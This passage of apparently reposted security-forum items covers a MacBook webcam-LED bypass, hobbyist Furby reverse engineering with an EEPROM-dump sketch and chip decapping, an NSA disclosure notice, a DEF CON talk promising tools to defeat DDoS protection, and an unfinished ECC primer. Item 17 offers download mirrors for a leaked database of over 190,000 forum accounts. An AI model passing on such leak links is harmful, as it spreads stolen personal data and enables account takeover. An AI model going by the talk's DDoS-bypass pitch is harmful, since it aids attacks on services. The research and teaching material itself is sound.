your computer,” says Charlie Miller, a security expert at Twitter. “There’s a chip in the battery, a chip in the keyboard, a chip in the camera.” MacBooks are designed to prevent software running on the MacBook’s central processing unit (CPU) from activating its iSight camera without turning on the light. But researchers figured out how to reprogram the chip inside the camera, known as a micro-controller, to defeat this security feature. In a paper called “iSeeYou: Disabling the MacBook Webcam Indicator LED,” Brocker and Checkoway describe how to reprogram the iSight camera’s micro-controller to allow the camera and light to be activated independently. That allows the camera to be turned on while the light stays off. Their research is under consideration for an upcoming academic security conference. The researchers also provided us with a copy of their proof-of-concept software. In the video below, we demonstrate how the camera can be activated without triggering the telltale warning light. Attacks that exploit microcontrollers are becoming more common. “People are starting to think about what happens when you can reprogram each of those,” Miller says. For example, he demonstrated an attack last year on the software that controls Apple batteries, which causes the battery to discharge rapidly, potentially leading to a fire or explosion. Another researcher was able to convert the built-in Apple keyboard into spyware using a similar method. According to the researchers, the vulnerability they discovered affects “Apple internal iSight webcams found in earlier-generation Apple products, including the iMac G5 and early Intel-based iMacs, MacBooks, and MacBook Pros until roughly 2008.” While the attack outlined in the paper is limited to these devices, researchers like Charlie Miller suggest that the attack could be applicable to newer systems as well. “There’s no reason you can’t do it -- it’s just a lot of work and resources but it depends on how well [Apple] secured the hardware,” Miller says. Apple did not reply to requests for comment. Brocker and Checkoway write in their report that they contacted the company on July 16. “Apple employees followed up several times but did not inform us of any possible mitigation plans,” the researchers write. RATted out The software used by Abrahams in the Wolf case is known as a Remote Administration Tool, or RAT. This software, which allows someone to control a computer from across the Internet, has legitimate purposes as well as nefarious ones. For example, it can make it easier for a school’s IT staff to administer a classroom full of computers. Indeed, the devices the researchers studied were similar to MacBooks involved in a notorious case in Pennsylvania in 2008. In that incident, administrators at Lower Merion High School outside Philadelphia reportedly captured 56,000 images of students using the RAT installed on school-issued laptops. Students reported seeing a ‘creepy’ green flicker that indicated that the camera was in use. That helped to alert students to the issue, eventually leading to a lawsuit. But more sophisticated remote monitoring tools may already have the capabilities to suppress the warning light, says Morgan Marquis-Boire, a security researcher at the University of Toronto. He says that cheap RATs like the one used in Merion High School may not have the ability to disable the hardware LEDs, but “you would probably expect more sophisticated surveillance offerings which cost hundreds of thousands of euros” to be stealthier. He points to commercial surveillance products such as Hacking Team and FinFisher that are marketed for use by governments. FinFisher is a suite of tools sold by a European firm called the Gamma Group. A company marketing document released by WikiLeaks indicated that Finfisher could be “covertly deployed on the Target Systems” and enable, among other things, “Live Surveillance through Webcam and Microphone.” The Chinese government has also been accused of using RATs for surveillance purposes. A 2009 report from the University of Toronto described a surveillance program called Ghostnet that the Chinese government allegedly used to spy on prominent Tibetans, including the Dalai Lama. The authors reported that “web cameras are being silently triggered, and audio inputs surreptitiously activated,” though it’s not clear whether the Ghostnet software is capable of disabling camera warning lights. Luckily, there’s an easy way for users to protect themselves. “The safest thing to do is to put a piece of tape on your camera,” Miller says. Ashkan Soltani is an independent security researcher and consultant. Sursa: Research shows how MacBook Webcams can spy on their users without warning
  12. Deci ca sugestii: 1. Disable Javascript (temporar) 2. Random user agent 3. Spoof MAC Altceva?
  13. Reverse Engineering a Furby Table of Contents Introduction About the Device Inter-Device Communication Reversing the Android App Reversing the Hardware Dumping the EEPROM Decapping Proprietary Chips SEM Imaging of Decapped Chips Introduction This past semester I’ve been working on a directed study at my university with Prof. Wil Robertson reverse engineering embedded devices. After a couple of months looking at a passport scanner, one of my friends jokingly suggested I hack a Furby, the notoriously annoying toy of late 1990s fame. Everyone laughed, and we all moved on with our lives. However, the joke didn’t stop there. Within two weeks, this same friend said they had a present for me. And that’s how I started reverse engineering a Furby. About the Device A Furby is an evil robotic children’s toy wrapped in colored fur. Besides speaking its own gibberish-like language called Furbish, a variety of sensors and buttons allow it to react to different kinds of stimuli. Since its original debut in 1998, the Furby apparently received a number of upgrades and new features. The specific model I looked at was from 2012, which supported communication between devices, sported LCD eyes, and even came with a mobile app. Inter-Device Communication As mentioned above, one feature of the 2012 version was the toy’s ability to communicate with other Furbys as well as the mobile app. However, after some investigation I realized that it didn’t use Bluetooth, RF, or any other common wireless protocols. Instead, a look at the official Hasbro Furby FAQ told a more interesting story: Q. There is a high pitched tone coming from Furby and/or my iOS device. A. The noise you are hearing is how Furby communicates with the mobile device and other Furbys. Some people may hear it, others will not. Some animals may also hear the noise. Don’t worry, the tone will not cause any harm to people or animals. Digging into this lead, I learned that Furbys in fact perform inter-device communication with an audio protocol that encodes data into bursts of high-pitch frequencies. That is, devices communicate with one another via high-pitch sound waves with a speaker and microphone. #badBIOS anyone? This was easily confirmed by use of the mobile app which emitted a modulated sound similar to the mosquito tone whenever an item or command was sent to the Furby. The toy would also respond with a similar sound which was recorded by the phone’s microphone and decoded by the app. Upon searching, I learned that other individuals had performed a bit of prior work in analyzing this protocol. Notably, the GitHub project Hacksby appears to have successfully reverse engineered the packet specification, developed scripts to encode and decode data, and compiled a fairly complete database of events understood by the Furby. Reversing the Android App Since the open source database of events is not currently complete, I decided to spend a few minutes looking at the Android app to identify how it performed its audio decoding. After grabbing the .apk via APK Downloader, it was simple work to get to the app’s juicy bits: $ unzip -q com.hasbro.furby.apk $ d2j-dex2jar.sh classes.dex dex2jar classes.dex -> classes-dex2jar.jar $ Using jd-gui, I then decompiled classes-dex2jar.jar into a set of .java source files. I skimmed through the source files of a few app features that utilized the communication protocol (e.g., Deli, Pantry, Translator) and noticed a few calls to methods named sendComAirCmd(). Each method accepted an integer as input, which was spliced and passed to objects created from the generalplus.com.GPLib.ComAirWrapper class: private void sendComAirCmd(int paramInt){ Logger.log(Deli.TAG, "sent command: " + paramInt); Integer localInteger1 = Integer.valueOf(paramInt); int i = 0x1F & localInteger1.intValue() >> 5; int j = 32 + (0x1F & localInteger1.intValue()); ComAirWrapper.ComAirCommand[] arrayOfComAirCommand = new ComAirWrapper.ComAirCommand[2]; ComAirWrapper localComAirWrapper1 = this.comairWrapper; localComAirWrapper1.getClass(); arrayOfComAirCommand[0] = new ComAirWrapper.ComAirCommand(localComAirWrapper1, i, 0.5F); ComAirWrapper localComAirWrapper2 = this.comairWrapper; localComAirWrapper2.getClass(); arrayOfComAirCommand[1] = new ComAirWrapper.ComAirCommand(localComAirWrapper2, j, 0.0F); he name generalplus appears to identify the Taiwanese company General Plus, which “engage in the research, development, design, testing and sales of high quality, high value-added consumer integrated circuits (ICs).” I was unable to find any public information about the GPLib/ComAir library. However, a thread on /g/ from 2012 appears to have made some steps towards identifying the General Plus chip, among others. The source code at generalplus/com/GPLib/ComAirWrapper.java defined a number of methods providing wrapper functionality around encoding and decoding data, though none of the functionality itself. Continuing to dig, I found the file libGPLibComAir.so: $ file lib/armeabi/libGPLibComAir.so lib/armeabi/libGPLibComAir.so: ELF 32-bit LSB shared object, ARM, version 1 (SYSV), dynamically linked, stripped Quick analysis on the binary showed that this was likely the code I had been looking for: $ nm -D lib/armeabi/libGPLibComAir.so | grep -i -e encode -e decode -e command0000787d T ComAir_GetCommand00004231 T Java_generalplus_com_GPLib_ComAirWrapper_Decode000045e9 T Java_generalplus_com_GPLib_ComAirWrapper_GenerateComAirCommand00004585 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirDecodeMode000045c9 T Java_generalplus_com_GPLib_ComAirWrapper_GetComAirEncodeMode00004561 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirDecodeMode000045a5 T Java_generalplus_com_GPLib_ComAirWrapper_SetComAirEncodeMode000041f1 T Java_generalplus_com_GPLib_ComAirWrapper_StartComAirDecode00004211 T Java_generalplus_com_GPLib_ComAirWrapper_StopComAirDecode00005af5 T _Z13DecodeRegCodePhP15tagCustomerInfo000058cd T _Z13EncodeRegCodethPh00004f3d T _ZN12C_ComAirCore12DecodeBufferEPsi00004c41 T _ZN12C_ComAirCore13GetDecodeModeEv00004ec9 T _ZN12C_ComAirCore13GetDecodeSizeEv00004b69 T _ZN12C_ComAirCore13SetDecodeModeE16eAudioDecodeMode000050a1 T _ZN12C_ComAirCore16SetPlaySoundBuffEP19S_ComAirCommand_Tag00004e05 T _ZN12C_ComAirCore6DecodeEPsi00005445 T _ZN15C_ComAirEncoder10SetPinCodeEs00005411 T _ZN15C_ComAirEncoder11GetiDfValueEv0000547d T _ZN15C_ComAirEncoder11PlayCommandEi000053fd T _ZN15C_ComAirEncoder11SetiDfValueEi00005465 T _ZN15C_ComAirEncoder12IsCmdPlayingEv0000588d T _ZN15C_ComAirEncoder13GetComAirDataEPPcRi000053c9 T _ZN15C_ComAirEncoder13GetEncodeModeEv000053b5 T _ZN15C_ComAirEncoder13SetEncodeModeE16eAudioEncodeMode000053ed T _ZN15C_ComAirEncoder14GetCentralFreqEv00005379 T _ZN15C_ComAirEncoder14ReleasePlayersEv000053d9 T _ZN15C_ComAirEncoder14SetCentralFreqEi000056c1 T _ZN15C_ComAirEncoder15GenComAirBufferEiPiPs00005435 T _ZN15C_ComAirEncoder15GetWaveFormTypeEv000054bd T _ZN15C_ComAirEncoder15PlayCommandListEiP20tagComAirCommandList00005421 T _ZN15C_ComAirEncoder15SetWaveFormTypeEi00005645 T _ZN15C_ComAirEncoder17PlayComAirCommandEif00005755 T _ZN15C_ComAirEncoder24FillWavInfoAndPlayBufferEiPsf00005369 T _ZN15C_ComAirEncoder4InitEv000051f9 T _ZN15C_ComAirEncoderC1Ev000050b9 T _ZN15C_ComAirEncoderC2Ev00005351 T _ZN15C_ComAirEncoderD1Ev00005339 T _ZN15C_ComAirEncoderD2Ev I loaded the binary in IDA Pro and quickly confirmed my thought. The method generalplus.com.GPLib.ComAirWrapper.Decode() decompiled to the following function: unsigned int __fastcall Java_generalplus_com_GPLib_ComAirWrapper_Decode(int a1, int a2, int a3){ int v3; // ST0C_4@1 int v4; // ST04_4@1 int v5; // ST1C_4@1 const void *v6; // ST18_4@1 unsigned int v7; // ST14_4@1 v3 = a1; v4 = a3; v5 = _JNIEnv::GetArrayLength(); v6 = (const void *)_JNIEnv::GetShortArrayElements(v3, v4, 0); v7 = C_ComAirCore::DecodeBuffer((int)&unk_10EB0, v6, v5); _JNIEnv::ReleaseShortArrayElements(v3); return v7; } Within C_ComAirCore: DecodeBuffer() resided a looping call to ComAir_DecFrameProc() which appeared to be referencing some table of phase coefficients: int __fastcall ComAir_DecFrameProc(int a1, int a2){ int v2; // r5@1 signed int v3; // r4@1 int v4; // r0@3 int v5; // r3@5 signed int v6; // r2@5 v2 = a1; v3 = 0x40; if ( ComAir_Rate_Mode != 1 ) { v3 = 0x80; if ( ComAir_Rate_Mode == 2 ) v3 = 0x20; } v4 = (a2 << 0xC) / 0x64; if ( v4 > (signed int)&PHASE_COEF[0x157F] ) v4 = (int)&PHASE_COEF[0x157F]; v5 = v2; v6 = 0; do { ++v6; *(_WORD *)v5 = (unsigned int)(*(_WORD *)v5 * v4) >> 0x10; v5 += 2; } while ( v3 > v6 ); ComAirDec(); return ComAir_GetCommand(); } Near the end of the function was a call to the very large function ComAirDec(), which likely was decompiled with the incorrect number of arguments and performed the bulk of the audio decoding process. Data was transformed and parsed, and a number of symbols apparently associated with frequency-shift keying were referenced. Itching to continue onto reverse engineering the hardware, I began disassembling the device. Reversing the Hardware Actually disassembling the Furby itself proved more difficult than expected due to the form factor of the toy and number of hidden screws. Since various tear-downs of the hardware are already available online, let’s just skip ahead to extracting juicy secrets from the device. The heart of the Furby lies in the following two-piece circuit board: Thanks to another friend, I also had access to a second Furby 2012 model, this time the French version. Although the circuit boards of both devices were incredibly similar, differences did exist, most notably in the layout of the right-hand daughterboard. Additionally, the EEPROM chip (U2 on the board) was branded as Shenzen LIZE on the U.S. version, the French version was branded ATMEL: The first feature I noticed about the boards was the fact that a number of chips were hidden by a thick blob of epoxy. This is likely meant to thwart reverse engineers, as many of the important chips on the Furby are actually proprietary and designed (or at least contracted for development) by Hasbro. This is a standard PCB assembly technique known as “chip-on-board” or “direct chip attachment,” though it proves harder to identify the chips due to the lack of markings. However, one may still simply inspect the traces connected to the chip and infer its functionality from there. For now, let’s start with something more accessible and dump the exposed EEPROM. Dumping the EEPROM The EEPROM chip on the French version Furby is fairly standard and may be easily identified by its form and markings: By googling the markings, we find the datasheet and learn that it is a 24Cxx family EEPROM chip manufactured by ATMEL. This particular chip provides 2048 bits of memory (256 bytes), speaks I2C, and offers a write protect pin to prevent accidental data corruption. The chip on the U.S. version Furby has similar specs but is marked L24C02B-SI and manufactured by Shenzen LIZE. Using the same technique as on my Withings WS-30 project, I used a heat gun to desolder the chip from the board. Note that this MUST be done in a well-ventilated area. Intense, direct heat will likely scorch the board and release horrible chemicals into the air. Unlike my Withings WS-30 project, however, I no longer had access to an ISP programmer and would need to wire the EEPROM manually. I chose to use my Arduino Duemilanove since it provides an I2C interface and accompanying libraries for easy development. Referencing the datasheet, we find that there are eight total pins to deal with. Pins 1-3 (A0, A1, A2) are device address input pins and are used to assign a unique identifier to the chip. Since multiple EEPROM chips may be wired in parallel, a method must be used to identify which chip a controller wishes to speak with. By pulling the A0, A1, and A2 pins high or low, a 3-bit number is formed that uniquely identifies the chip. Since we only have one EEPROM, we can simply tie all three to ground. Likewise, pin 4 (GND) is also connected to ground. Pins 5 and 6 (SDA, SCL) designate the data and clock pins on the chip, respectively. These pins are what give “Two Wire Interface” (TWI) its name, as full communication may be achieved with just these two lines. SDA provides bi-directional serial data transfer, while SCL provides a clock signal. Pin 7 (WP) is the write protect pin and provides a means to place the chip in read-only mode. Since we have no intention of writing to the chip (we only want to read the chip without corrupting its contents), we can pull this pin high (5 volts). Note that some chips provide a “negative” WP pin; that is, connecting it to ground will enable write protection and pulling it high will disable it. Pin 8 (VCC) is also connected to the same positive power source. After some time learning the Wire library and looking at example code online, I used the following Arduino sketch to successfully dump 256 bytes of data from the French version Furby EEPROM chip: #include <Wire.h>#define disk1 0x50 // Address of eeprom chip byte i2c_eeprom_read_byte( int deviceaddress, unsigned int eeaddress ) { byte rdata = 0x11; Wire.beginTransmission(deviceaddress); // Wire.write((int)(eeaddress >> 8)); // MSB Wire.write((int)(eeaddress & 0xFF)); // LSB Wire.endTransmission(); Wire.requestFrom(deviceaddress,1); if (Wire.available()) rdata = Wire.read(); return rdata; } void setup(void) { Serial.begin(9600); Wire.begin(); unsigned int i, j; unsigned char b; for ( i = 0; i < 16; i++ ) { for ( j = 0; j < 16; j++ ) { b = i2c_eeprom_read_byte(disk1, (i * 16) + j); if ( (b & 0xf0) == 0 ) Serial.print("0"); Serial.print(b, HEX); Serial.print(" "); } Serial.println(); } } void loop(){} Note that unlike most code examples online, the “MSB” line of code within i2c_eeprom_read_byte() is commented out. Since our EEPROM chip is only 256 bytes large, we are only using 8-bit memory addressing, hence using a single byte. Larger memory capacities require use of larger address spaces (9 bits, 10 bits, so on) which require two bytes to accompany all necessary address bits. Upon running the sketch, we are presented with the following output: 2F 64 00 00 00 00 5A EB 2F 64 00 00 00 00 5A EB 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 00 04 00 00 02 18 05 00 00 04 00 00 02 18 0F 00 00 00 00 00 18 18 0F 00 00 00 00 00 18 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 Unfortunately, without much guidance or further analysis of the hardware (perhaps at runtime), it is difficult to make sense of this data. By watching the contents change over time or in response to specific events, it may be possible to gain a better understanding of these few bytes. Decapping Proprietary Chips With few other interesting chips freely available to probe, I turned my focus to the proprietary chips hidden by epoxy. Having seen a number of online resources showcase the fun that is chip decapping, I had the urge to try it myself. Additionally, the use of corrosive acid might just solve the issue of the epoxy in itself. Luckily, with the assistance and guidance of my Chemistry professor Dr. Geoffrey Davies, I was able to utilize the lab resources of my university and decap chips in a proper and safe manner. First, I isolated the three chips I wanted to decap (henceforth referenced as tiny, medium, and large) by desoldering their individual boards from the main circuit board. Since the large chip was directly connected to the underside of the board, I simply took a pair of sheers and cut around it. Each chip was placed in its own beaker of 70% nitric acid (HNO3) on a hot plate at 68°C. Great care was taken to ensure that absolutely no amount of HNO3 came in contact with skin or was accidentally consumed. The entire experiment took place in a fume hood which ensured that the toxic nitrogen dioxide (NO2) gas produced by the reaction was safely evacuated and not breathed in. Each sample took a different amount of time to fully decompose the epoxy, circuit board, and chip casing depending on its size. Since I was working with a lower concentration nitric acid than professionals typically use (red/white fuming nitric acid is generally preferred), the overall process took between 1-3 hours. “Medium” (left) and “Tiny” (right) After each chip had been fully exposed and any leftover debris removed, I removed the beakers from the hot plate, let cool, and decanted the remaining nitric acid into a waste collection beaker, leaving the decapped chips behind. A small amount of distilled water was then added to each beaker and the entirety of it poured onto filter paper. After rinsing each sample one or two more times with distilled water, the sample was then rinsed with acetone two or three times. The large chip took the longest to finish simply due to the size of the attached circuit board fragment. About 2.5 hours in, the underside of the chip had been exposed, though the epoxy blob had still not been entirely decomposed. At this point, the bonding wires for the chip (guessed to be a microcontroller) were still visible and intact: About thirty minutes later and with the addition of more nitric acid, all three samples were cleaned and ready for imaging: SEM Imaging of Decapped Chips The final step was to take high resolution images of each chip to learn more about its design and identify any potential manufacturer markings. Once again, I leveraged university resources and was able to make use of a Hitachi S-4800 scanning electron microscope (SEM) with great thanks to Dr. William Fowle. Each decapped chip was placed on a double-sided adhesive attached to a sample viewing plate. A few initial experimental SEM images were taken; however a number of artifacts were present that severely affected the image quality. To counter this, a small amount of colloidal graphite paint was added around the edges of each chip to provide a pathway to ground for the electrons. Additionally, the viewing plate was treated in a sputter coater machine where each chip was coated with 4.5nm of palladium to create a more conductive surface. After treatment, the samples were placed back in the SEM and imaged with greater success. Each chip was imaged in pieces, and each individual image was stitched together to form a single large, high resolution picture. The small and large chip overview images were shot at 5.0kV at 150x magnification, while the medium chip overview image was shot at 5.0kV at 30x magnification: Unfortunately, as can be seen in the image above, the medium chip did not appear to have cleaned completely in its nitric acid bath. Although it is believed to be a memory storage device of some sort (by looking at optical images), it is impossible to discern any finer details from the SEM image. A number of interesting features were found during the imaging process. The marking “GHG554? may be clearly seen directly west on the small chip. Additionally, in similar font face, the marking “GFI392? may be seen on the south-east corner of the large chip: Higher zoom images were also taken of generally interesting topology on the chips. For instance, the following two images show what looks like a “cheese grater” feature on both the small and large chips: If you are familiar with of these chips or any their features, feedback would be greatly appreciated. EDIT: According to cpldcpu, thebobfoster, and Thilo, the “cheese grater” structures are likely bond pads. Additional images taken throughout this project are available at: Flickr: mncoppola's Photostream Tremendous thanks go out to the following people for their guidance and donation of time and resources towards this project: Prof. Wil Robertson – College of Computer and Information Science @ NEU Dr. Geoffrey Davies – Dept. of Chemistry & Chemical Biology @ NEU Dr. William Fowle – Nanomaterials Instrumentation Facility @ NEU Molly White Kaylie DeHart Sursa: Reverse Engineering a Furby | Michael Coppola's Blog
  14. Full Disclosure The Internet Dark Age • Removing Governments on-line stranglehold • Disabling NSA/GCHQ major capabilities (BULLRUN / EDGEHILL) • Restoring on-line privacy - immediately by The Adversaries Update 1 - Spread the Word Uncovered – //NONSA//NOGCHQ//NOGOV - CC BY-ND On September 5th 2013, Bruce Schneier, wrote in The Guardian: “The NSA also attacks network devices directly: routers, switches, firewalls, etc. Most of these devices have surveillance capabilities already built in; the trick is to surreptitiously turn them on. This is an especially fruitful avenue of attack; routers are updated less frequently, tend not to have security software installed on them, and are generally ignored as a vulnerability”. “The NSA also devotes considerable resources to attacking endpoint computers. This kind of thing is done by its TAO – Tailored Access Operations – group. TAO has a menu of exploits it can serve up against your computer – whether you're running Windows, Mac OS, Linux, iOS, or something else – and a variety of tricks to get them on to your computer. Your anti-virus software won't detect them, and you'd have trouble finding them even if you knew where to look. These are hacker tools designed by hackers with an essentially unlimited budget. What I took away from reading the Snowden documents was that if the NSA wants in to your computer, it's in. Period”. http://www.theguardian.com/world/2013/sep/05/nsa-how-to-remain-securesurveillance The evidence provided by this Full-Disclosure is the first independent technical verifiable proof that Bruce Schneier's statements are indeed correct. We explain how NSA/GCHQ: • Are Internet wiretapping you • Break into your home network • Perform 'Tailored Access Operations' (TAO) in your home • Steal your encryption keys • Can secretly plant anything they like on your computer • Can secretly steal anything they like from your computer • How to STOP this Computer Network Exploitation Download: http://cryptome.org/2013/12/Full-Disclosure.pdf
  15. Defcon 21 - Kill 'Em All— Ddos Protection Total Annihilation! Description: With the advent of paid DDoS protection in the forms of CleanPipe, CDN / Cloud or whatnot, the sitting ducks have stood up and donned armors... or so they think! We're here to rip apart this false sense of security by dissecting each and every mitigation techniques you can buy today, showing you in clinical details how exactly they work and how they can be defeated. Essentially we developed a 3-fold attack methodology: stay just below red-flag rate threshold, mask our attack traffics inconspicuous, emulate the behavior of a real networking stack with a human operator behind it in order to spoof the correct response to challenges, ??? PROFIT! We will explain all the required look-innocent headers, TCP / HTTP challenge-response handshakes,JS auth bypass, etc. etc. in meticulous details. With that knowledge you too can be a DDoS ninja! Our PoC attack tool "Kill-em-All" will then be introduced as a platform to put what you've learned into practice, empowering you to bypass all DDoS mitigation layers and get straight through to the backend where havoc could be wrought. Oh and for the skeptics among you, we'll be showing testing results against specific products and services. As a battle-hardened veteran in the DDoS battlefield, Tony "MT" Miu has garnered invaluable experiences and secrets of the trade, making him a distinguished thought leader in DDoS mitigation technologies. At Nexusguard, day in day out he deals with high-profile mission-critical clients, architecturing for them full-scale DDoS mitigation solutions where failure is not an option. He has presented at DEF CON 20 and AVTokyo 2012 a talk titled "DDoS Black and White Kungfu Revealed", and at the 6th Annual HTCIA Asia-Pacific Conference a workshop titled "Network Attack Investigation". With "Impossible is Nothing" as his motto, Dr. Lee never fails to impress with his ingenious implementation prowess. With years of SOC experience under his belt, systematic security engineering and process optimization are his specialties. As a testament to his versatility, Dr. Lee has previously presented in conferences across various disciplines including ACM VRCIA, ACM VRST, IEEE ICECS and IEEE ECCTD. For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Kill 'Em All— Ddos Protection Total Annihilation!
  16. Offensive Security Bug Bounty Program
  17. [h=3]hackforums.net - 190.000+ Accounts Leaked! #AntiSec[/h] www.hackforums.net - DOWNLOAD (110MB UNZIPPED) - Mirror1: http://inventati.org/anonhacknews/leak/Hackforums.net%20%28200k%20users%29.sql Mirror2: https://anonfiles.com/file/03e4cac3df6eb30ba9640c00474bc64a Mirror3: http://bayfiles.net/file/11Nrt/8zK5wI/Hackforums.net_%28200k_users%29.zip Enjoy. Posted by AnonHackNews Sursa: AnonHackNews Blog: hackforums.net - 190.000+ Accounts Leaked! #AntiSec
  18. A (Relatively Easy To Understand) Primer on Elliptic Curve Cryptography Published on October 24, 2013 05:00AM by Nick Sullivan. Elliptic Curve Cryptography (ECC) is one of the most powerful but least understood types of cryptography in wide use today. At CloudFlare, we make extensive use of ECC to secure everything from our customers' HTTPS connections to how we pass data between our data centers. Fundamentally, we believe it's important to be able to understand the technology behind any security system in order to trust it. To that end, we looked around to find a good, relatively easy-to-understand primer on ECC in order to share with our users. Finding none, we decided to write one ourselves. That is what follows. Be warned: this is a complicated subject and it's not possible to boil down to a pithy blog post. In other words, settle in for a bit of an epic because there's a lot to cover. If you just want the gist, the TL;DR is: ECC is the next generation of public key cryptography and, based on currently understood mathematics, provides a significantly more secure foundation than first generation public key cryptography systems like RSA. If you're worried about ensuring the highest level of security while maintaining performance, ECC makes sense to adopt. If you're interested in the details, read on. The dawn of public key cryptography The history of cryptography can be split into two eras: the classical era and the modern era. The turning point between the two occurred in 1977, when both the RSA algorithm and the Diffie-Hellman key exchange algorithm were introduced. These new algorithms were revolutionary because they represented the first viable cryptographic schemes where security was based on the theory of numbers; it was the first to enable secure communication between two parties without a shared secret. Cryptography went from being about securely transporting secret codebooks around the world to being able to have provably secure communication between any two parties without worrying about someone listening in on the key exchange. Whitfield Diffie and Martin Hellman Modern cryptography is founded on the idea that the key that you use to encrypt your data can be made public while the key that is used to to decrypt your data can be kept private. As such, these systems are known as public key cryptographic systems. The first, and still most widely used of these systems, is known as RSA — named after the initials of the three men who first publicly described the algorithm: Ron Rivest, Adi Shamir and Leonard Adleman. What you need for a public key cryptographic system to work is a set of algorithms that is easy to process in one direction, but difficult to undo. In the case of RSA, the easy algorithm multiplies two prime numbers. If multiplication is the easy algorithm, its difficult pair algorithm is factoring the product of the multiplication into its two component primes. Algorithms that have this characteristic — easy in one direction, hard the other — are known as Trapdoor Functions. Finding a good Trapdoor Function is critical to making a secure public key cryptographic system. Simplistically: the bigger the spread between the difficulty of going one direction in a Trapdoor Function and going the other, the more secure a cryptographic system based on it will be. A toy RSA algorithm The RSA algorithm is the most popular and best understood public key cryptography system. Its security relies on the fact that factoring is slow and multiplication is fast. What follows is a quick walk-through of what a small RSA system looks like and how it works. In general, a public key encryption system has two components, a public key and a private key. Encryption works by taking a message and applying a mathematical operation to it to get a random-looking number. Decryption takes the random looking number and applies a different operation to get back to the original number. Encryption with the public key can only be undone by decrypting with the private key. Computers don't do well with arbitrarily large numbers. We can make sure that the numbers we are dealing with do not get too large by choosing a maximum number and only dealing with numbers less than the maximum. We can treat the numbers like the numbers on an analog clock. Any calculation that results in a number larger than the maximum gets wrapped around to a number in the valid range. In RSA, this maximum value (call it max) is obtained by multiplying two random prime numbers. The public and private keys are two specially chosen numbers that are greater than zero and less than the maximum value, call them pub and priv. To encrypt a number you multiply it by itself pub times, making sure to wrap around when you hit the maximum. To decrypt a message, you multiply it by itself priv times and you get back to the original number. It sounds surprising, but it actually works. This property was a big breakthrough when it was discovered. To create a RSA key pair, first randomly pick the two prime numbers to obtain the maximum (max). Then pick a number to be the public key pub. As long as you know the two prime numbers, you can compute a corresponding private key priv from this public key. This is how factoring relates to breaking RSA — factoring the maximum number into its component primes allows you to compute someone's private key from the public key and decrypt their private messages. Let's make this more concrete with an example. Take the prime numbers 13 and 7, their product gives us our maximum value of 91. Let's take our public encryption key to be the number 5. Then using the fact that we know 7 and 13 are the factors of 91 and applying an algorithm called the Extended Euclidean Algorithm, we get that the private key is the number 29. These parameters (max: 91, pub: 5; priv: 29) define a fully functional RSA system. You can take a number and multiply it by itself 5 times to encrypt it, then take that number and multiply it by itself 29 times and you get the original number back. Let's use these values to encrypt the message "CLOUD". In order to represent a message mathematically we have to turn the letters into numbers. A common representation of the Latin alphabet is UTF-8. Each character corresponds to a number. Under this encoding, CLOUD is 67, 76, 79, 85, 68. Each of these digits are smaller than our maximum of 91, so we can encrypt them individually. Let's start with the first letter. We have to multiply it by itself 5 times to get the encrypted value. 67×67 = 4489 = 30 * *Since 4489 is larger than max, we have to wrap it around. We do that by dividing by 91 and taking the remainder. 4489 = 91×41 + 30 30×67 = 2010 = 8 8×67 = 536 = 81 81×67 = 5427 = 58 This means the encrypted version of 67 is 58. Repeating the process for each of the letters we get that the encrypted message CLOUD becomes: 58, 20, 53, 50, 87 To decrypt this scrambled message, we take each number and multiply it by itself 29 times: 58×58 = 3364 = 88 (remember, we wrap around when the number is greater than max) 88×58 = 5104 = 8 … 9×58 = 522 = 67 Voila, we're back to 67. This works with the rest of the digits, resulting in the original message. The takeaway is that you can take a number, multiply it by itself a number of times to get a random-looking number, then multiply that number by itself a secret number of times to get back to the original number. Not a perfect Trapdoor RSA and Diffie-Hellman were so powerful because they came with rigorous security proofs. The authors proved that breaking the system is equivalent to solving a mathematical problem that is thought to be difficult to solve. Factoring is a very well known problem and has been studied since antiquity (see Sieve of Eratosthenes). Any breakthroughs would be big news and would net the discoverer a significant financial windfall. "Find factors, get money" - Notorious T.K.G. (Reuters) That said, factoring is not the hardest problem on a bit for bit basis. Specialized algorithms like the Quadratic Sieve and the General Number Field Sieve were created to tackle the problem of prime factorization and have been moderately successful. These algorithms are faster and less computationally intensive than the naive approach of just guessing pairs of known primes. These factoring algorithms get more efficient as the size of the numbers being factored get larger. The gap between the difficulty of factoring large numbers and multiplying large numbers is shrinking as the number (i.e. the key's bit length) gets larger. As the resources available to decrypt numbers increase, the size of the keys need to grow even faster. This is not a sustainable situation for mobile and low-powered devices that have limited computational power. The gap between factoring and multiplying is not sustainable in the long term. All this means is that RSA is not the ideal system for the future of cryptography. In an ideal Trapdoor Function, the easy way and the hard way get harder at the same rate with respect to the size of the numbers in question. We need a public key system based on a better Trapdoor. Elliptic curves: Building blocks of a better Trapdoor After the introduction of RSA and Diffie-Hellman, researchers explored other mathematics-based cryptographic solutions looking for other algorithms beyond factoring that would serve as good Trapdoor Functions. In 1985, cryptographic algorithms were proposed based on an esoteric branch of mathematics called elliptic curves. But what exactly is an elliptic curve and how does the underlying Trapdoor Function work? Unfortunately, unlike factoring — something we all had to do for the first time in middle school — most people aren't as familiar with the math around elliptic curves. The math isn't as simple, nor is explaining it, but I'm going to give it a go over the next few sections. (If your eyes start to glaze over, you can skip way down to the section: What does it all mean.) An elliptic curve is the set of points that satisfy a specific mathematical equation. The equation for an elliptic curve looks something like this: y2 = x3 + ax + b That graphs to something that looks a bit like the Lululemon logo tipped on its side: There are other representations of elliptic curves, but technically an elliptic curve is the set points satisfying an equation in two variables with degree two in one of the variables and three in the other. An elliptic curve is not just a pretty picture, it also has some properties that make it a good setting for cryptography. Strange symmetry Take a closer look at the elliptic curve plotted above. It has several interesting properties. One of these is horizontal 